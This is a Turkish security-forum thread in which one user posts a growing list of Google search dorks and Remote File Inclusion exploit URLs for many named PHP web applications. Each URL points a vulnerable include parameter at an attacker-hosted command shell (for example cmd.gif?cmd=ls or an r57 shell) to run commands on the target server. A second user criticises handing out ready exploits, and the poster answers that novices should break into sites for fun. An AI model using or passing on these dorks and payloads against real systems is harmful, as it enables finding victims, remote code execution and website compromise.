folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Rfi Yollari



Rfi Yollari

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    gXgX
    gXgX's avatar
    Kayıt Tarihi: 04/Ağustos/2006
    Erkek
    Arkadaslar forumda artik butun Rfi ( Remote File İnclusion ) aciklarinin yollarini bu topic altinda yayalim ( ben ve siz )

    Eger rfi nedir bilmiyorsaniz, ve ogrenmek icin hevesliyseniz http://www.tahribat.com/forumdisplayfolder.asp?folderid=30745 bu adrese girin

    Neyse basliyalim..

    Not : Surekli guncellenecektir bu topic


    ***********************************************

    Google'da aramak icin : Powered by Quezza ©

    Acıklar;

    www.hedef.com/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?


    Google'da aramak icin : powered by ezUserManager

    Acık;

    www.hedef.com/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls


    Google'da aramak icin : powered by Php Blue Dragon Platinum

    Acık;

    www.hedef.com/[dragon_path>/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts>


    Google'da aramak icin : PHPListPro ©2001-2006 SmartISoft

    Acıklar;

    www.hedef.com/listproklasörü/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
    www.hedef.com/listproklasörü/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
    www.hedef.com/listproklasörü/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
    www.hedef.com/listproklasörü/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls


    Google'da aramak icin : ActualScripts, Company. All rights reserved.

    Acıklar;

    www.hedef.com/hedefklasör/direct.php?rf=http://www.yourspace.com/yourscript.php?
    www.hedef.com/hedefklasör/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF


    Google'da aramak icin : powered by EQdkp

    Acık;

    www.hedef.com/includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls


    Google'da aramak icin : intitle:"Login to Calendar"

    Acık;

    http://www.hedef.com/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls


    Google'da aramak icin : "Powered by TotalCalendar"

    Acıklar;

    www.hedef.com/hdefklasör/index.php?inc_dir=http://www.yourspace.com/yourscript.php?
    www.hedef.com/hdefklasör/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF


    Google'da aramak icin : "Powered By Aardvark Topsites PHP 4.2.2"

    Acık;

    www.hedef.com/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls



    Google'da aramak icin : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"

    Acık;

    www.hedef.com/hedefklasör/classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=


    Google'da aramak icin : inurl:"toplist.php" "powered by phpbb"

    Acık;

    www.hedef.com/hedefklasr/toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls


    Google'da aramak icin : inurl:/system/article/alltopics.php OR inurl:/system/user/index.php

    Acık;

    www.hedef.com/hedefklasör/master.php?root_path=http://yourhost/cmd.gif?cmd=ls



    Google'da aramak icin : Agent-See By Bright Banana

    Acıklar;

    http://www.site.com/[Agent-See_path]/index.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/agent_image.php?Id=1&langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/agentdisplay.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/browse.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/browse-adv.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/buy.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/comments.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/contact.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/emailnewpass.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/friendmail.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/general.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/privacy.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/problems.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/request-viewing.php?langfile=[evil_code]
    http://www.site.com/[Agent-See_path]/user_help.php?langfile=[evil_code]



    Google'da aramak icin : "(Powered By ScozNews)"

    Acıklar;

    http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]

    http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]

    http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]

    http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]

    http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]

    http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]

    http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]

    http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]

    http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]



    Google'da aramak icin : Powered by Socketwiz

    Acık;

    http://www.site.com/[swBookmarks_path]/smarty_config.php?root_dir=[evil_code]


    Google'da aramak icin : inurl:classified.php phpbazar

    Acık;

    www.hedef.com/hedefklasör/classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls



    Google'da aramak icin : CaLogic Calendars V1.2.2

    Acık;

    http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]




    Google'da aramak icin : allinurl:"/ubbthreads/"

    Acık ;

    www.hedef.com/[klasör]/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id


    Simdilik bukadar devami gelecektir..
    Reply With Quote Alıntı yap
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    gXgX
    gXgX's avatar
    Kayıt Tarihi: 04/Ağustos/2006
    Erkek
    WoW Roster <= 1.70 (/lib/phpbb.php) Remote File Include Vulnerability

    http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls
    Reply With Quote Alıntı yap
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kurdo
    kurdo's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek
    bence fazla kasma. bunları takip edip açık aramak demek iskodan farklı olmamak demek :) yanlış anlama lafım sana değil. remote fil incl. olayının mantığını genel kullanımı anlat bırak millet açık bulsun kullansın hazıra konmasınlar anlamayanında cehenneme kadar yolu var. böyle yaparak herkeşin heçkırcı olmasını sağlıyorsun sora babasının cebinden 10 ytl çalıp domain alıyor sora da heçkır tim kuruyorlar :)
    kendinize ayığ olunuz
    Reply With Quote Alıntı yap
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ravage
    Ravage's avatar
    Kayıt Tarihi: 02/Ocak/2006
    Erkek
    real cok haklı bu konuda
    +10
    Buralar bizden sorulur... Ravage@tahribat.com
    Reply With Quote Alıntı yap
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    gXgX
    gXgX's avatar
    Kayıt Tarihi: 04/Ağustos/2006
    Erkek
    Ogrensinler, acsinlar onlar acmazlarsa biz kimle eglenecez ?

    bunlari dusundun mu ? :)
    Reply With Quote Alıntı yap
Toplam Hit: 13621 Toplam Mesaj: 5